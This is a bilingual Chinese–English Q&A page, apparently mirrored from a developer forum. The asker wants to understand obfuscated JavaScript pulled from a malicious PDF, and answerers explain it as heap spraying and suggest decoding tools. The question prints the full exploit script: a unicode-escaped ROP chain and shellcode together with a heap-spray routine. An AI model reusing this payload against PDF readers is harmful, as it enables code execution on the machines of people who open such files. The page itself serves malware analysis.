从恶意PDF中提取JavaScript [英] Extract JavaScript from malicious PDF

查看:122
本文介绍了从恶意PDF中提取JavaScript的处理方法,对大家解决问题具有一定的参考价值,需要的朋友们下面随着小编来一起学习吧!

问题描述

我有一个PDF文件,实际上我知道该文件包含一个JavaScript脚本文件,该文件具有恶意功能,目前还不确定.

I have a PDF file that I know for a fact contains a JavaScript script file that does something malicious, not really sure what at this point.

我已经成功解压缩了PDF文件并获得了纯文本JavaScript源代码,但是如果我以前从未见过这种语法的话,它就是代码本身.

I have successfully uncompressed the PDF file and gotten the plaintext JavaScript source code, but it the code itself if kind of hidden in this syntax I haven't seen before.

代码示例:这是大多数代码的样子

Code example: This is what the majority of the code looks like

var bDWXfJFLrOqFuydrq = unescape;
var QgFjJUluesCrSffrcwUwOMzImQinvbkaPVQwgCqYCEGYGkaGqery = bDWXfJFLrOqFuydrq( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692....')

我想这种带有长变量/函数名和隐藏文本字符的表示法会混淆寻找此类事物的扫描仪.

I imagine that this notation with long variable/function names and hidden text characters is to confuse scanners that look for these type of things.

两个问题:

问题1

有人可以告诉我%u4141叫什么吗?

Can someone tell me what this is called with the %u4141?

问题2

是否有一些工具可以将该符号转换为纯文本,以便我能看到它在做什么?

Is there some tool that will translate that notation into plaintext so I can see what it is doing?

完整的JS代码:

var B = unescape('%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%uadba%u8e19%uda62%ud9cb%u2474%u58f4%uc931%u49b1%u5031%u8314%ufce8%u5003%u4f10%u72ec%u068a%u8b0f%u784b%u6e99%uaa7a%ufbfd%u7a2f%ua975%uf1c3%u5adb%u7757%u6df4%u3dd0%u4322%uf0e1%u0fea%u9321%u4d96%u7376%u9da6%u728b%uc0ef%u2664%u8fb8%ud6d7%ud2cd%ud7eb%u5901%uaf53%u9e24%u0520%ucf26%u1299%uf760%u7c92%u0651%u9f76%u41ad%u6bf3%u5045%ua2d5%u62a6%u6819%u4a99%u7194%u6ddd%u0447%u8e15%u1efa%uecee%uab20%u57f3%u0ba2%u66d0%ucd67%u6593%u9acc%u69fc%u4fd3%u9577%u6e58%u1f58%u541a%u7b7c%uf5f8%u2125%u0aaf%u8d35%uae10%u3c3d%uc844%u291f%ue6a9%ua99f%u71a5%u9bd3%u296a%u907b%uf7e3%ud77c%u4fd9%u2612%uafe2%ued3a%uffb6%uc454%u94b6%ue9a4%u3a62%u45f5%ufadd%u25a5%u928d%ua9af%u82f2%u63cf%u289b%ue435%u0464%ufd34%u560c%ue837%udf7f%u78d1%u8990%u154a%u9009%u8401%u0fd6%u866c%ua35d%u4990%uce96%u3e82%u8556%ue9f9%u3069%u1597%ubefc%u413e%ubc68%ua567%u3f37%ubd42%ud5fe%uaa2d%u39fe%u2aae%u53a9%u42ae%u070d%u77fd%u9252%u2b91%u1cc7%u98c0%u7440%uc7ee%udba7%u2211%u2036%u0bc4%u50bc%u7862%u417c');

var C = unescape("%"+"u"+"0"+"c"+"0"+"c"+"%u"+"0"+"c"+"0"+"c");

while (C.length + 20 + 8 < 65536) C+=C;

D = C.substring(0, (0x0c0c-0x24)/2);

D += B;
D += C;
E = D.substring(0, 65536/2);
while(E.length < 0x80000) E += E;
F = E.substring(0, 0x80000 - (0x1020-0x08) / 2);
var G = new Array();
for (H=0;H<0x1f0;H++) G[H]=F+"s";​

推荐答案

这些可能是内存地址,操作系统调用,堆喷射等.

Those could be memory addresses, OS calls, heap spraying, anything.

线索是所调用的函数是unescape.要获取实际值,您想unescape该文本.有用于将文本转义的在线工具,例如 http ://www.web-code.org/coding-tools/javascript-escape-unescape-converter-tool.html .

The clue is that the function that is called is unescape. To get the actual values you want to unescape that text. There are online tools for unescaping text, such as http://www.web-code.org/coding-tools/javascript-escape-unescape-converter-tool.html.

结果可能会以ASCII形式出现垃圾,但是您可以尝试将其插入十六进制编辑器,以查看是否可以从中获得更多的意义.如果病毒扫描程序可以识别该文件的感染源,也许您可​​以对该特定恶意软件进行更多研究,并弄清楚该代码在做什么.

The result will likely be garbage in ASCII, but you can try plugging it into a hex editor to see if you can make any more sense out of it. if a virus scanner can identify the infection source of that file, maybe you can do more research on that particular malware and figure out what that code is doing.

出于科学的考虑,启动Windows VM,运行它,然后看它能做什么:)

In the interest of science, fire up a Windows VM, run it, and see what it does :)

这篇关于从恶意PDF中提取JavaScript的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!

查看全文
登录 关闭
扫码关注1秒登录
发送“验证码”获取 | 15天全站免登陆